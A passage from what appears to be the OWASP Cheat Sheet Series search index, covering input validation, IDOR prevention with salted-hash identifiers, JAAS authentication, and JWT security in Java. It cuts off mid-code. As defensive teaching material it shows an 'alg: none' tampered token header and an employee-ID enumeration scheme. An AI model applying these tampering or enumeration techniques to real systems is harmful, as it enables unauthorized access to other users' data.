^(AA|AE|AP|AL|AK|AS|AZ|AR|CA|CO|CT|DE|DC|FM|FL|GA|GU|\nHI|ID|IL|IN|IA|KS|KY|LA|ME|MH|MD|MA|MI|MN|MS|MO|MT|NE|\nNV|NH|NJ|NM|NY|NC|ND|MP|OH|OK|OR|PW|PA|PR|RI|SC|SD|TN|\nTX|UT|VT|VI|VA|WA|WV|WI|WY)$\n

Java Regex Usage Example:

Example validating the parameter \"zip\" using a regular expression.

private static final Pattern zipPattern = Pattern.compile(\"^\\\\d{5}(-\\\\d{4})?$\");\n\npublic void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException {\ntry {\nString zipCode = request.getParameter(\"zip\");\nif (!zipPattern.matcher(zipCode).matches()) {\nthrow new YourValidationException(\"Improper zipcode format.\");\n}\n// do what you want here, after it's been validated ..\n} catch (YourValidationException e) {\nresponse.sendError(HttpServletResponse.SC_BAD_REQUEST, e.getMessage());\n}\n}\n

Some Allow list validators have also been predefined in various open source packages that you can leverage. For example:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#client-side-vs-server-side-validation","title":"Client Side vs Server Side Validation","text":"

Be aware that any JavaScript input validation performed on the client can be bypassed by an attacker that disables JavaScript or uses a Web Proxy. Ensure that any input validation performed on the client is also performed on the server.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#validating-rich-user-content","title":"Validating Rich User Content","text":"

It is very difficult to validate rich content submitted by a user. For more information, please see the XSS cheatsheet on Sanitizing HTML Markup with a Library Designed for the Job.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#preventing-xss-and-content-security-policy","title":"Preventing XSS and Content Security Policy","text":"

All user-controlled data must be encoded when returned in the HTML page to prevent the execution of malicious data (e.g. XSS). For example, <script> would be returned as &lt;script&gt;.

The type of encoding is specific to the context of the page where the user controlled data is inserted. For example, HTML entity encoding is appropriate for data placed into the HTML body. However, user data placed into a script would need JavaScript specific output encoding.
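
As an illustration, assuming the OWASP Java Encoder library is available, context-specific encoding could look like the following (a sketch; other well-maintained encoding libraries work equally well):

import org.owasp.encoder.Encode;\n\n...\n\n// Encode for the HTML body context before writing user-controlled data into the page\nString safeForHtml = Encode.forHtml(userControlledValue);\n// The same value placed inside a script block needs JavaScript-specific encoding instead\nString safeForJavaScript = Encode.forJavaScript(userControlledValue);\n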

Detailed information on XSS prevention here: OWASP XSS Prevention Cheat Sheet

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#file-upload-validation","title":"File Upload Validation","text":"

Many websites allow users to upload files, such as a profile picture. This section helps you provide that feature securely.

Check the File Upload Cheat Sheet.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#upload-verification","title":"Upload Verification","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#upload-storage","title":"Upload Storage","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#public-serving-of-uploaded-content","title":"Public Serving of Uploaded Content","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#beware-of-special-files","title":"Beware of \"special\" files","text":"

The upload feature should be using an allow-list approach to only allow specific file types and extensions. However, it is important to be aware of the following file types that, if allowed, could result in security vulnerabilities:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#image-upload-verification","title":"Image Upload Verification","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#email-address-validation","title":"Email Address Validation","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#syntactic-validation","title":"Syntactic Validation","text":"

The format of email addresses is defined by RFC 5321, and is far more complicated than most people realise. As an example, the following are all considered to be valid email addresses:

Properly parsing email addresses for validity with regular expressions is very complicated, although there are a number of publicly available documents on regex.

The biggest caveat on this is that although the RFC defines a very flexible format for email addresses, most real world implementations (such as mail servers) use a far more restricted address format, meaning that they will reject addresses that are technically valid. Although they may be technically correct, these addresses are of little use if your application will not be able to actually send emails to them.

As such, the best way to validate email addresses is to perform some basic initial validation, and then pass the address to the mail server and catch the exception if it rejects it. This means that the application can be confident that its mail server can send emails to any addresses it accepts. The initial validation could be as simple as:
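
A minimal sketch of such basic initial checks (the mail server remains the final arbiter of whether an address is usable):

public static boolean basicEmailCheck(String address) {\n// Reject null values and addresses longer than the practical 254 character limit\nif (address == null || address.length() > 254) {\nreturn false;\n}\nint at = address.indexOf('@');\n// Require exactly one '@' with a non-empty local part and a non-empty domain\nreturn at > 0 && at == address.lastIndexOf('@') && at < address.length() - 1;\n}\n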

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#semantic-validation","title":"Semantic Validation","text":"

Semantic validation is about determining whether the email address is correct and legitimate. The most common way to do this is to send an email to the user, and require that they click a link in the email, or enter a code that has been sent to them. This provides a basic level of assurance that:

The links that are sent to users to prove ownership should contain a token that is:

After validating the ownership of the email address, the user should then be required to authenticate on the application through the usual mechanism.
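
A hedged sketch of generating such a single-use verification token with a cryptographically secure random source (storage, expiry, and single-use enforcement are application-specific and omitted):

import java.security.SecureRandom;\nimport java.util.Base64;\n\n...\n\nSecureRandom random = new SecureRandom();\nbyte[] tokenBytes = new byte[32];\nrandom.nextBytes(tokenBytes);\n// URL-safe, unpadded encoding so the token can be embedded in the link sent to the user\nString token = Base64.getUrlEncoder().withoutPadding().encodeToString(tokenBytes);\n// Persist the token server-side with an expiry and tie it to the pending email address\n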

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#disposable-email-addresses","title":"Disposable Email Addresses","text":"

In some cases, users may not want to give their real email address when registering on the application, and will instead provide a disposable email address. These are publicly available addresses that do not require the user to authenticate, and are typically used to reduce the amount of spam received by users' primary email addresses.

Blocking disposable email addresses is almost impossible, as there are a large number of websites offering these services, with new domains being created every day. There are a number of publicly available lists and commercial lists of known disposable domains, but these will always be incomplete.

If these lists are used to block the use of disposable email addresses then the user should be presented with a message explaining why they are blocked (although they are likely to simply search for another disposable provider rather than giving their legitimate address).

If it is essential that disposable email addresses are blocked, then registrations should only be allowed from specifically-allowed email providers. However, if this includes public providers such as Google or Yahoo, users can simply register their own disposable address with them.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#sub-addressing","title":"Sub-Addressing","text":"

Sub-addressing allows a user to specify a tag in the local part of the email address (before the @ sign), which will be ignored by the mail server. For example, if the example.org domain supports sub-addressing, then the following email addresses are equivalent:

Many mail providers (such as Microsoft Exchange) do not support sub-addressing. The most notable provider who does is Gmail, although there are many others that also do.

Some users will use a different tag for each website they register on, so that if they start receiving spam to one of the sub-addresses they can identify which website leaked or sold their email address.

Because it could allow users to register multiple accounts with a single email address, some sites may wish to block sub-addressing by stripping out everything between the + and @ signs. This is not generally recommended, as it suggests that the website owner is either unaware of sub-addressing or wishes to prevent users from identifying them when they leak or sell email addresses. Additionally, it can be trivially bypassed by using disposable email addresses, or simply registering multiple email accounts with a trusted provider.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html","title":"Insecure Direct Object Reference Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Insecure Direct Object Reference (called IDOR from here) occurs when an application exposes a reference to an internal implementation object. In doing so, an IDOR reveals the real identifier and the format or pattern used for the element in the storage backend. The most common example is a record identifier in a storage system such as a database or filesystem, though these are not the only examples.

IDOR is referenced in element A4 of the OWASP Top 10, in the 2013 edition.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#context","title":"Context","text":"

IDOR does not create a direct security issue itself because, by itself, it reveals only the format or pattern used for the object identifier. However, IDOR brings, depending on the format or pattern in place, a capacity for the attacker to mount an enumeration attack, allowing the attacker to try to probe access to the associated objects.

In an enumeration attack, the attacker builds a collection of valid identifiers using the discovered format or pattern and tests them against the application.

For example:

Imagine an HR application exposing a service accepting employee IDs in order to return employee information, and for which the format or pattern of the employee ID is the following:

EMP-00000\nEMP-00001\nEMP-00002\n...\n

Based on this, an attacker can build a collection of valid IDs from EMP-00000 to EMP-99999.

To be exploited, an IDOR issue must be combined with an Access Control issue, because it's the Access Control issue that \"allows\" the attacker to access the object for which they have guessed the identifier through the enumeration attack.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#additional-remarks","title":"Additional remarks","text":"

From Jeff Williams:

Direct Object Reference is fundamentally a Access Control problem. We split it out to emphasize the difference between URL access control and data layer access control. You can't do anything about the data-layer problems with URL access control. And they're not really input validation problems either. But we see DOR manipulation all the time. If we list only \"Messed-up from the Floor-up Access Control\" then people will probably only put in SiteMinder or JEE declarative access control on URLs and call it a day. That's what we're trying to avoid.

From Eric Sheridan:

An object reference map is first populated with a list of authorized values which are temporarily stored in the session. When the user requests a field (ex: color=654321), the application does a lookup in this map from the session to determine the appropriate column name. If the value does not exist in this limited map, the user is not authorized. Reference maps should not be global (i.e. include every possible value), they are temporary maps/dictionaries that are only ever populated with authorized values.

\"A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter.\"

I'm \"down\" with DOR's for files, directories, etc. But not so much for ALL databases primary keys. That's just insane, like you are suggesting. I think that anytime database primary keys are exposed, an access control rule is required. There is no way to practically DOR all database primary keys in a real enterprise or post-enterprise system.

But, suppose a user has a list of accounts, like a bank where database ID 23456 is their checking account. I'd DOR that in a heartbeat. You need to be prudent about this.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#objective","title":"Objective","text":"

This article proposes an idea to prevent the exposure of real identifiers in a simple, portable, and stateless way because the proposal needs to handle session and session-less application topologies.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#proposition","title":"Proposition","text":"

The proposal uses a hash to replace the direct identifier. This hash is salted with a value defined at the application level to support topologies in which the application is deployed in multi-instance mode, such as in production environments.

Using a hash enables the following properties:

This is the implementation of the utility class that generates the identifier to use for an exchange with the front-end:

import javax.xml.bind.DatatypeConverter;\nimport java.io.UnsupportedEncodingException;\nimport java.security.MessageDigest;\nimport java.security.NoSuchAlgorithmException;\n\n/**\n * Handle the creation of ID that will be send to front end side\n * in order to prevent IDOR\n */\n\npublic class IDORUtil {\n/**\n     * SALT used for the generation of the HASH of the real item identifier\n     * in order to prevent to forge it on front end side.\n     */\nprivate static final String SALT = \"[READ_IT_FROM_APP_CONFIGURATION]\";\n\n/**\n     * Compute a identifier that will be send to the front end and be used as item\n     * unique identifier on client side.\n     *\n     * @param realItemBackendIdentifier Identifier of the item on the backend storage\n     *                                  (real identifier)\n     * @return A string representing the identifier to use\n     * @throws UnsupportedEncodingException If string's byte cannot be obtained\n     * @throws NoSuchAlgorithmException If the hashing algorithm used is not\n     *                                  supported is not available\n     */\npublic static String computeFrontEndIdentifier(String realItemBackendIdentifier)\nthrows NoSuchAlgorithmException, UnsupportedEncodingException {\nString frontEndId = null;\nif (realItemBackendIdentifier != null && !realItemBackendIdentifier.trim().isEmpty()) {\n//Prefix the value with the SALT\nString tmp = SALT + realItemBackendIdentifier;\n//Get and configure message digester\n//We use SHA1 here for the following reason even if SHA1 have now potential collision:\n//1. We do not store sensitive information, just technical ID\n//2. We want that the ID stay short but not guessable\n//3. We want that a maximum of backend storage support the algorithm used in order to compute it in selection query/request\n//If your backend storage supports SHA256 so use it instead of SHA1\nMessageDigest digester = MessageDigest.getInstance(\"sha1\");\n//Compute the hash\nbyte[] hash = digester.digest(tmp.getBytes(\"utf-8\"));\n//Encode is in HEX\nfrontEndId = DatatypeConverter.printHexBinary(hash);\n}\nreturn frontEndId;\n}\n}\n

This is an example of services using the front-end identifier:

/**\n * Service to list all available movies\n *\n * @return The collection of movies ID and name as JSON response\n */\n@RequestMapping(value = \"/movies\", method = GET, produces = {MediaType.APPLICATION_JSON_VALUE})\npublic Map<String, String> listAllMovies() {\nMap<String, String> result = new HashMap<>();\n\ntry {\nthis.movies.forEach(m -> {\ntry {\n//Compute the front end ID for the current element\nString frontEndId = IDORUtil.computeFrontEndIdentifier(m.getBackendIdentifier());\n//Add the computed ID and the associated item name to the result map\nresult.put(frontEndId, m.getName());\n} catch (Exception e) {\nLOGGER.error(\"Error during ID generation for real ID {}: {}\", m.getBackendIdentifier(),\ne.getMessage());\n}\n});\n} catch (Exception e) {\n//Ensure that in case of error no item is returned\nresult.clear();\nLOGGER.error(\"Error during processing\", e);\n}\n\nreturn result;\n}\n\n/**\n * Service to obtain the information on a specific movie\n *\n * @param id Movie identifier from a front end point of view\n * @return The movie object as JSON response\n */\n@RequestMapping(value = \"/movies/{id}\", method = GET, produces = {MediaType.APPLICATION_JSON_VALUE})\npublic Movie obtainMovieName(@PathVariable(\"id\") String id) {\n\n//Search for the wanted movie information using Front End Identifier\nOptional<Movie> movie = this.movies.stream().filter(m -> {\nboolean match;\ntry {\n//Compute the front end ID for the current element\nString frontEndId = IDORUtil.computeFrontEndIdentifier(m.getBackendIdentifier());\n//Check if the computed ID match the one provided\nmatch = frontEndId.equals(id);\n} catch (Exception e) {\n//Ensure that in case of error no item is returned\nmatch = false;\nLOGGER.error(\"Error during processing\", e);\n}\nreturn match;\n}).findFirst();\n\n//We have marked the Backend Identifier class field as excluded\n//from the serialization\n//So we can send the object to front end through the serializer\nreturn movie.get();\n}\n

This is the value object used:

public class Movie {\n/**\n     * We indicate to serializer that this field must never be serialized\n     *\n     * @see \"https://fasterxml.github.io/jackson-annotations/javadoc/2.5/com/fasterxml/\n     *       jackson/annotation/JsonIgnore.html\"\n     */\n@JsonIgnore\nprivate String backendIdentifier;\n...\n}\n
"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

GitHub repository.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html","title":"JAAS Cheat Sheet","text":""},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#introduction-what-is-jaas-authentication","title":"Introduction - What is JAAS authentication","text":"

The process of verifying the identity of a user or another system is authentication.

JAAS, as an authentication framework, manages the authenticated user's identity and credentials from login to logout.

The JAAS authentication lifecycle:

  1. Create LoginContext.
  2. Read the configuration file for one or more LoginModules to initialize.
  3. Call each LoginModule's initialize() method.
  4. Call LoginContext.login(), which in turn calls each LoginModule's login() method.
  5. If login succeeds, call each LoginModule's commit() method, otherwise call its abort() method.
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#configuration-file","title":"Configuration file","text":"

The JAAS configuration file contains a LoginModule stanza for each LoginModule available for logging on to the application.

A stanza from a JAAS configuration file:

Branches\n{\n    USNavy.AppLoginModule required\n    debug=true\n    succeeded=true;\n}\n

Note the placement of the semicolons, terminating both LoginModule entries and stanzas.

The word required indicates the LoginContext's login() method must be successful when logging in the user. The LoginModule-specific values debug and succeeded are passed to the LoginModule.

They are defined by the LoginModule and their usage is managed inside the LoginModule. Note that options are configured using key-value pairs such as debug=\"true\"; the key and value should be separated by an = sign.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#mainjava-the-client","title":"Main.java (The client)","text":"
java -Djava.security.auth.login.config==packageName/packageName.config\n        packageName.Main Stanza1\n\nWhere:\n    packageName is the directory containing the config file.\n    packageName.config specifies the config file in the Java package, packageName.\n    packageName.Main specifies Main.java in the Java package, packageName.\n    Stanza1 is the name of the stanza Main() should read from the config file.\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#loginmodulejava","title":"LoginModule.java","text":"

A LoginModule must have the following authentication methods:

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#initialize","title":"initialize()","text":"

In Main(), after the LoginContext reads the correct stanza from the config file, the LoginContext instantiates the LoginModule specified in the stanza.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#login","title":"login()","text":"

Captures user supplied login information. The code snippet below declares an array of two callback objects which, when passed to the callbackHandler.handle method in the callbackHandler.java program, will be loaded with a username and password provided interactively by the user:

NameCallback nameCB = new NameCallback(\"Username\");\nPasswordCallback passwordCB = new PasswordCallback (\"Password\", false);\nCallback[] callbacks = new Callback[] { nameCB, passwordCB };\ncallbackHandler.handle (callbacks);\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#commit","title":"commit()","text":"

Once the user's credentials are successfully verified during login(), the JAAS authentication framework associates the credentials, as needed, with the subject.

There are two types of credentials, Public and Private:

Principals (i.e. Identities the subject has other than their login name) such as employee number or membership ID in a user group are added to the subject.

Below is an example commit() method where first, for each group the authenticated user has membership in, the group name is added as a principal to the subject. The subject's username is then added to their public credentials.

Code snippet setting and then adding any principals and a public credential to a subject:

public boolean commit() {\nif (userAuthenticated) {\nSet groups = UserService.findGroups(username);\nfor (Iterator itr = groups.iterator(); itr.hasNext(); ) {\nString groupName = (String) itr.next();\nUserGroupPrincipal group = new UserGroupPrincipal(groupName);\nsubject.getPrincipals().add(group);\n}\nUsernameCredential cred = new UsernameCredential(username);\nsubject.getPublicCredentials().add(cred);\n}\nreturn userAuthenticated;\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#abort","title":"abort()","text":"

The abort() method is called when authentication doesn't succeed. Before the abort() method exits the LoginModule, care should be taken to reset state including the username and password input fields.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#logout","title":"logout()","text":"

The release of the user's principals and credentials when LoginContext.logout is called:

public boolean logout() {\nif (!subject.isReadOnly()) {\nSet principals = subject.getPrincipals(UserGroupPrincipal.class);\nsubject.getPrincipals().removeAll(principals);\nSet creds = subject.getPublicCredentials(UsernameCredential.class);\nsubject.getPublicCredentials().removeAll(creds);\nreturn true;\n} else {\nreturn false;\n}\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#callbackhandlerjava","title":"CallbackHandler.java","text":"

The callbackHandler is in a source (.java) file separate from any single LoginModule so that it can service a multitude of LoginModules with differing callback objects:

public void handle(Callback[] callbacks) {\nfor (int i = 0; i < callbacks.length; i++) {\nCallback callback = callbacks[i];\nif (callback instanceof NameCallback) {\nNameCallback nameCallBack = (NameCallback) callback;\nnameCallBack.setName(username);\n}  else if (callback instanceof PasswordCallback) {\nPasswordCallback passwordCallBack = (PasswordCallback) callback;\npasswordCallBack.setPassword(password.toCharArray());\n}\n}\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#disclosure","title":"Disclosure","text":"

All of the code in the attached JAAS cheat sheet has been copied verbatim from this free source.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html","title":"JSON Web Token Cheat Sheet for Java","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Many applications use JSON Web Tokens (JWT) to allow the client to indicate its identity for further exchange after authentication.

From JWT.IO:

JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA.

JSON Web Token is used to carry information related to the identity and characteristics (claims) of a client. This information is signed by the server in order for it to detect whether it was tampered with after sending it to the client. This will prevent an attacker from changing the identity or any characteristics (for example, changing the role from simple user to admin, or changing the client login).

This token is created during authentication (is provided in case of successful authentication) and is verified by the server before any processing. It is used by an application to allow a client to present a token representing the user's \"identity card\" to the server and allow the server to verify the validity and integrity of the token in a secure way, all of this in a stateless and portable approach (portable in the way that client and server technologies can be different including also the transport channel even if HTTP is the most often used).

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-structure","title":"Token Structure","text":"

Token structure example taken from JWT.IO:

[Base64(HEADER)].[Base64(PAYLOAD)].[Base64(SIGNATURE)]

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.\neyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.\nTJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ\n

Chunk 1: Header

{\n\"alg\": \"HS256\",\n\"typ\": \"JWT\"\n}\n

Chunk 2: Payload

{\n\"sub\": \"1234567890\",\n\"name\": \"John Doe\",\n\"admin\": true\n}\n

Chunk 3: Signature

HMACSHA256( base64UrlEncode(header) + \".\" + base64UrlEncode(payload), KEY )\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#objective","title":"Objective","text":"

This cheatsheet provides tips to prevent common security issues when using JSON Web Tokens (JWT) with Java.

The tips presented in this article are part of a Java project that was created to show the correct way to handle creation and validation of JSON Web Tokens.

You can find the Java project here; it uses the official JWT library.

In the rest of the article, the term token refers to the JSON Web Tokens (JWT).

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#consideration-about-using-jwt","title":"Consideration about Using JWT","text":"

Even if a JWT is \"easy\" to use and allows services (mostly REST style) to be exposed in a stateless way, it's not the solution that fits all applications, because it comes with some caveats, such as the question of the storage of the token (tackled in this cheatsheet) and others...

If your application does not need to be fully stateless, you can consider using the traditional session system provided by all web frameworks and follow the advice from the dedicated session management cheat sheet. However, for stateless applications, when well implemented, it's a good candidate.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#issues","title":"Issues","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#none-hashing-algorithm","title":"None Hashing Algorithm","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom","title":"Symptom","text":"

This attack, described here, occurs when an attacker alters the token and changes the hashing algorithm to indicate, through the none keyword, that the integrity of the token has already been verified. As explained in the link above some libraries treated tokens signed with the none algorithm as a valid token with a verified signature, so an attacker can alter the token claims and the modified token will still be trusted by the application.
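
For example, a tampered header that tries to disable signature verification looks like this:

{\n\"alg\": \"none\",\n\"typ\": \"JWT\"\n}\n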

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent","title":"How to Prevent","text":"

First, use a JWT library that is not exposed to this vulnerability.

Then, during token validation, explicitly require that the expected algorithm was used.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example","title":"Implementation Example","text":"
// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n\n...\n\n//Create a verification context for the token requesting\n//explicitly the use of the HMAC-256 hashing algorithm\nJWTVerifier verifier = JWT.require(Algorithm.HMAC256(keyHMAC)).build();\n\n//Verify the token, if the verification fail then a exception is thrown\nDecodedJWT decodedToken = verifier.verify(token);\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-sidejacking","title":"Token Sidejacking","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_1","title":"Symptom","text":"

This attack occurs when a token has been intercepted/stolen by an attacker and they use it to gain access to the system under the targeted user's identity.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_1","title":"How to Prevent","text":"

A way to prevent this is to add a \"user context\" to the token. The user context is composed of a random string (a fingerprint) that is generated during authentication, sent to the client in a hardened cookie (with the HttpOnly, Secure and SameSite=Strict flags), and stored as a SHA-256 hash in a dedicated claim of the token.

IP addresses should not be used as part of the context because there are legitimate situations in which the IP address can change during the same session. For example, when a user accesses an application through their mobile device and the mobile operator changes during the exchange, the IP address may (often) change. Moreover, using the IP address can potentially cause issues with European GDPR compliance.

During token validation, if the received token does not contain the right context (for example, if it has been replayed), then it must be rejected.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_1","title":"Implementation example","text":"

Code to create the token after successful authentication.

// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n// Random data generator\nprivate SecureRandom secureRandom = new SecureRandom();\n\n...\n\n//Generate a random string that will constitute the fingerprint for this user\nbyte[] randomFgp = new byte[50];\nsecureRandom.nextBytes(randomFgp);\nString userFingerprint = DatatypeConverter.printHexBinary(randomFgp);\n\n//Add the fingerprint in a hardened cookie - Add cookie manually because\n//SameSite attribute is not supported by javax.servlet.http.Cookie class\nString fingerprintCookie = \"__Secure-Fgp=\" + userFingerprint\n+ \"; SameSite=Strict; HttpOnly; Secure\";\nresponse.addHeader(\"Set-Cookie\", fingerprintCookie);\n\n//Compute a SHA256 hash of the fingerprint in order to store the\n//fingerprint hash (instead of the raw value) in the token\n//to prevent an XSS to be able to read the fingerprint and\n//set the expected cookie itself\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] userFingerprintDigest = digest.digest(userFingerprint.getBytes(\"utf-8\"));\nString userFingerprintHash = DatatypeConverter.printHexBinary(userFingerprintDigest);\n\n//Create the token with a validity of 15 minutes and client context (fingerprint) information\nCalendar c = Calendar.getInstance();\nDate now = c.getTime();\nc.add(Calendar.MINUTE, 15);\nDate expirationDate = c.getTime();\nMap<String, Object> headerClaims = new HashMap<>();\nheaderClaims.put(\"typ\", \"JWT\");\nString token = JWT.create().withSubject(login)\n.withExpiresAt(expirationDate)\n.withIssuer(this.issuerID)\n.withIssuedAt(now)\n.withNotBefore(now)\n.withClaim(\"userFingerprint\", userFingerprintHash)\n.withHeader(headerClaims)\n.sign(Algorithm.HMAC256(this.keyHMAC));\n

Code to validate the token.

// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n\n...\n\n//Retrieve the user fingerprint from the dedicated cookie\nString userFingerprint = null;\nif (request.getCookies() != null && request.getCookies().length > 0) {\nList<Cookie> cookies = Arrays.stream(request.getCookies()).collect(Collectors.toList());\nOptional<Cookie> cookie = cookies.stream().filter(c -> \"__Secure-Fgp\"\n.equals(c.getName())).findFirst();\nif (cookie.isPresent()) {\nuserFingerprint = cookie.get().getValue();\n}\n}\n\n//Compute a SHA256 hash of the received fingerprint in cookie in order to compare\n//it to the fingerprint hash stored in the token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] userFingerprintDigest = digest.digest(userFingerprint.getBytes(\"utf-8\"));\nString userFingerprintHash = DatatypeConverter.printHexBinary(userFingerprintDigest);\n\n//Create a verification context for the token\nJWTVerifier verifier = JWT.require(Algorithm.HMAC256(keyHMAC))\n.withIssuer(issuerID)\n.withClaim(\"userFingerprint\", userFingerprintHash)\n.build();\n\n//Verify the token, if the verification fail then an exception is thrown\nDecodedJWT decodedToken = verifier.verify(token);\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#no-built-in-token-revocation-by-the-user","title":"No Built-In Token Revocation by the User","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_2","title":"Symptom","text":"

This problem is inherent to JWT because a token only becomes invalid when it expires. The user has no built-in feature to explicitly revoke the validity of a token. This means that if a token is stolen, the user cannot revoke it themselves and thereby block the attacker.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_2","title":"How to Prevent","text":"

Since JWT tokens are stateless, there is no session maintained on the server(s) serving client requests. As such, there is no session to invalidate on the server side. A well-implemented Token Sidejacking solution (as explained above) should alleviate the need for maintaining a block list on the server side. This is because the hardened cookie used in the Token Sidejacking protection can be considered as secure as a session ID used in a traditional session system, and unless both the cookie and the JWT token are intercepted/stolen, the JWT is unusable. A logout can thus be 'simulated' by clearing the JWT from session storage. If the user chooses to close the browser instead, then both the cookie and the sessionStorage are cleared automatically.

Another way to protect against this is to implement a token block list that will be used to mimic the \"logout\" feature that exists in traditional session management systems.

The block list will keep a digest (SHA-256, encoded in HEX) of the token together with a revocation date. Each entry must be retained at least until the token expires.

When the user wants to \"log out\", they call a dedicated service that adds the provided token to the block list, resulting in an immediate invalidation of the token for further use in the application.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_2","title":"Implementation Example","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#block-list-storage","title":"Block List Storage","text":"

A database table with the following structure will be used as the central block list storage.

create table if not exists revoked_token(jwt_token_digest varchar(255) primary key,\nrevocation_date timestamp default now());\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-revocation-management","title":"Token Revocation Management","text":"

Code in charge of adding a token to the block list and checking if a token is revoked.

/**\n* Handle the revocation of the token (logout).\n* Use a DB in order to allow multiple instances to check for revoked token\n* and allow cleanup at centralized DB level.\n*/\npublic class TokenRevoker {\n\n/** DB Connection */\n@Resource(\"jdbc/storeDS\")\nprivate DataSource storeDS;\n\n/**\n  * Verify if a digest encoded in HEX of the ciphered token is present\n  * in the revocation table\n  *\n  * @param jwtInHex Token encoded in HEX\n  * @return Presence flag\n  * @throws Exception If any issue occur during communication with DB\n  */\npublic boolean isTokenRevoked(String jwtInHex) throws Exception {\nboolean tokenIsPresent = false;\nif (jwtInHex != null && !jwtInHex.trim().isEmpty()) {\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Compute a SHA256 of the ciphered token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] cipheredTokenDigest = digest.digest(cipheredToken);\nString jwtTokenDigestInHex = DatatypeConverter.printHexBinary(cipheredTokenDigest);\n\n//Search token digest in HEX in DB\ntry (Connection con = this.storeDS.getConnection()) {\nString query = \"select jwt_token_digest from revoked_token where jwt_token_digest = ?\";\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, jwtTokenDigestInHex);\ntry (ResultSet rSet = pStatement.executeQuery()) {\ntokenIsPresent = 